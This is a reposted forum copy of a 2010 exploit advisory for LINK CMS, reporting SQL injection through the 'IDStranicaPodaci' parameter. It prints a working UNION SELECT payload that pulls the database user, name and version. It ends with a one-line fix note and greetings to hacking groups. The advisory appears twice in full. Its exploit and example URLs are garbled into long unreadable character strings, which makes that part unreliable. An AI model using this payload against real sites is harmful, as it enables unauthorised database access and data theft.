-
-
[转帖]LINK CMS SQL Injection Vulnerability
-
发表于: 2010-8-25 11:10 1855
-
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : d0fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2$3K9h3I4*7L8$3&6W2i4K6u0W2L8%4u0Y4i4K6u0o6 e8bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8W2L8Y4c8W2M7%4c8A6L8X3N6Q4x3X3c8J5M7#2)9J5k6h3!0J5k6H3`.`.
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################
===[ Exploit ]===
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
7fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2M7Y4k6W2M7W2)9J5c8X3&6S2N6X3W2Y4j5h3y4A6K9X3q4Q4x3X3g2H3K9s2m8Q4x3@1k6B7k6i4A6A6K9#2)9K6c8r3I4S2N6q4)9J5y4V1W2p5e0h3g2F1K9f1N6D9j5i4k6F1K9g2)9K6c8o6k6Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2i4K6y4p5y4o6g2Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2x3#2)9K6c8o6k6Q4x3U0k6u0c8q4y4@1M7X3q4F1K9h3y4S2f1r3!0V1j5h3y4A6i4K6y4p5y4U0y4Q4y4f1u0e0f1f1I4A6i4K6g2p5
===[ Example ]===
66cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2M7Y4k6W2M7W2)9J5c8X3&6S2N6X3W2Y4j5h3y4A6K9X3q4Q4x3X3g2H3K9s2m8Q4x3@1k6B7k6i4A6A6K9#2)9K6c8r3I4S2N6q4)9J5y4V1W2p5e0h3g2F1K9f1N6D9j5i4k6F1K9g2)9K6c8o6k6Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2i4K6y4p5y4o6g2Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2x3#2)9K6c8o6k6Q4x3U0k6u0c8q4y4@1M7X3q4F1K9h3y4S2f1r3!0V1j5h3y4A6i4K6y4p5i4K6u0V1y4U0x3`.
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
===[ Solution ]===
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-)))
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : d0fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2$3K9h3I4*7L8$3&6W2i4K6u0W2L8%4u0Y4i4K6u0o6 e8bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4m8W2L8Y4c8W2M7%4c8A6L8X3N6Q4x3X3c8J5M7#2)9J5k6h3!0J5k6H3`.`.
.:. Script : LINK CMS
.:. Bug Type : Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################
===[ Exploit ]===
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
7fcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2M7Y4k6W2M7W2)9J5c8X3&6S2N6X3W2Y4j5h3y4A6K9X3q4Q4x3X3g2H3K9s2m8Q4x3@1k6B7k6i4A6A6K9#2)9K6c8r3I4S2N6q4)9J5y4V1W2p5e0h3g2F1K9f1N6D9j5i4k6F1K9g2)9K6c8o6k6Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2i4K6y4p5y4o6g2Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2x3#2)9K6c8o6k6Q4x3U0k6u0c8q4y4@1M7X3q4F1K9h3y4S2f1r3!0V1j5h3y4A6i4K6y4p5y4U0y4Q4y4f1u0e0f1f1I4A6i4K6g2p5
===[ Example ]===
66cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4W2M7Y4k6W2M7W2)9J5c8X3&6S2N6X3W2Y4j5h3y4A6K9X3q4Q4x3X3g2H3K9s2m8Q4x3@1k6B7k6i4A6A6K9#2)9K6c8r3I4S2N6q4)9J5y4V1W2p5e0h3g2F1K9f1N6D9j5i4k6F1K9g2)9K6c8o6k6Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2i4K6y4p5y4o6g2Q4x3U0k6u0c8p5#2W2L8X3W2b7L8$3c8e0k6h3E0U0K9h3A6S2x3#2)9K6c8o6k6Q4x3U0k6u0c8q4y4@1M7X3q4F1K9h3y4S2f1r3!0V1j5h3y4A6i4K6y4p5i4K6u0V1y4U0x3`.
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
===[ Solution ]===
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-)))
赞赏
他的文章
赞赏
雪币:
留言: